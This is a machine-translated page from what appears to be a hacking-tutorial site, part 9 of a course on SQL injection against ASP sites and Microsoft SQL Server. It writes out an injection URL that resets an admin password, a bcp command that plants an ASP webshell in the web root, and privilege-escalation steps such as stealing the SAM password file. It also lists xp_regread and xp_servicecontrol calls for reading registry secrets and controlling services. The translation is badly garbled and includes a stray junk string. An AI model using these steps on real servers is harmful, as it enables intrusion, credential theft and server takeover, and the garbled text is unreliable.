Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
The hacker teaches you anything is the SQL injection method attack(9)
  Add date: 07/16/2008   Publishing date: 07/16/2008   Hits: 13
Total 10 pages, Current page:9, Jump to page:
 

HTTP://xxx.xxx.xxx/abc.asp? p=YY; update TestDB.dbo.admin set pwd='… where username='www'; -- (1 MD5 value is: AAABBBCCCDDDEEEF, namely alters to the password 1; www is the known user name)
May certainly change with the similar method the password the original value.
 
2nd, leads the file function using the table content
SQL has the BCP order, it may lead the table content existing writing this article and puts to assigns the position. Using this function, we may construct one to be near the first watch, then a line of line of place inputs a ASP wooden horse in the table, then orders with BCP to derive forms the ASP document.
The command line form is as follows:
bcp “select * from text. .foo” queryout c:\inetpub\wwwroot\runcommand.asp - c - S localhost - U sa - P foobar ('S'canshu for execution inquiry's server, 'U'canshu for user, 'P'canshu is a password, has uploaded a runcommand.asp wooden horse finally)

Sixth, obtains system's manager jurisdiction
ASP wooden horse only then USER jurisdiction, if wants to gain to system's complete control, but must have system's manager jurisdiction. How to manage? The promotion jurisdiction's method has many kinds: AYgOkYn#? G  
(As soon as uploads the wooden horse, the revision starting automatic movement .ini document it restarts, then died has decided);
Duplicates CMD.exe to arrive at scripts, artificial makes the UNICODE crack;
Downloads the SAM document, explains and gains the OS all user famous password;
And so on, regards system's special details to decide, may adopt the different method.

 
Seventh, several SQL-SERVER special-purpose methods
1st, uses the xp_regread expansion memory process revision registry
the [xp_regread] another useful built-in memory process is the kind of function set (Xp_regaddmultistring, Xp_regdeletekey, Xp_regdeletevalue, Xp_regenumkeys, Xp_regenumvalues, Xp_regread, Xp_regremovemultistring, Xp_regwrite). The aggressor may use these function revision registry, like reads the SAM value, the permission establishes the spatial connection, starting automatic operating procedure and so on. For example:
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM \ CurrentControlSet \ Services \ lanmanserver \ parameters', what conversation connection 'does nullsessionshares' determine in the server available.
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM \ CurrentControlSet \ Services \ snmp \ parameters \ validcommunities' demonstrated that on the server all SNMP association disposed, has these information, the aggressor has been possible to redeploy in the identical network network equipment.
 
2nd, uses other memory process to change the server
the xp_servicecontrol process permission user starts, stops the service. For example:
(exec master. .xp_servicecontrol 'start', 'schedule'
exec master. .xp_servicecontrol 'start', 'server')
Xp_availablemedia demonstrates on the machine the useful driver
The Xp_dirtree permission obtains a directory tree  
Xp_enumdsn enumerates on server's ODBC data pool

 
Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * Next>>
Prev:The random combined command achieves exempts kills Next:The SQL weak password 1433 catch the chicken to meet the question

Comment:

Category: Home > hacker course
Home